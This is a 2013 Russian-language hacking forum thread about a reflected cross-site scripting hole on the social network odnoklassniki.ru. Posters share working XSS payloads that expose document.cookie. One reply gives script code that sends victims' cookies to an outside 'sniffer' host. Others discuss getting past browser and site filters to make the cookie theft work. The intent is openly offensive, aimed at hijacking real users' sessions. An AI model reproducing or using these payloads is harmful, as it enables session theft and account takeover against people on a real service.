Пассивная XSS odnoklassniki.ru

Discussion in 'Уязвимости Mail-сервисов' started by DavidRog, 15 Jan 2013.

  1. DavidRog

    DavidRog New Member

    Joined:
    1 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    10
    Из соседней темы, взял эту пассивку.
    Подставляя такое:
    <img src="x" onerror=alert(document.cookie);>
    или
    <b onmouseover=alert(document.cookie)>click me!</b>
    вылазит алерт.
    Вопрос.. а как снифер сюда прикрутить ?
     
  2. йож

    йож Banned

    Joined:
    31 Aug 2012
    Messages:
    50
    Likes Received:
    10
    Reputations:
    0
    <script>
    img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;
    </script>
     
  3. DavidRog

    DavidRog New Member

    Joined:
    1 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    10
    Ну дело в том, что если подставлять <script>alert(/xss/)</script>, то алерт не вылетает.. соответственно и на снифер нечего не приходит..
     
  4. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Ты про обход фильтров что нибудь слышал?
     
  5. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    хром и ие фильтруют пассивки
     
  6. йож

    йож Banned

    Joined:
    31 Aug 2012
    Messages:
    50
    Likes Received:
    10
    Reputations:
    0
    какой браузер?
     
  7. DavidRog

    DavidRog New Member

    Joined:
    1 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    10
    пробовал через FF и CHROME.
    вот так <script<script>alert(/xss/)</script> в коде хтмл вроде все ровно, но алерт не вылазит.

    пару лет назад все получалось, а щас нет.
    подумал просто что есть какой-то вариант не в теги <script> выполнять произвольный код. а например в <img src="x" onerror="ТУТ ЧТО-ТО.. ЧТОБЫ СНИФЕР ЗАХАВАЛ">
     
    #7 DavidRog, 15 Jan 2013
    Last edited: 15 Jan 2013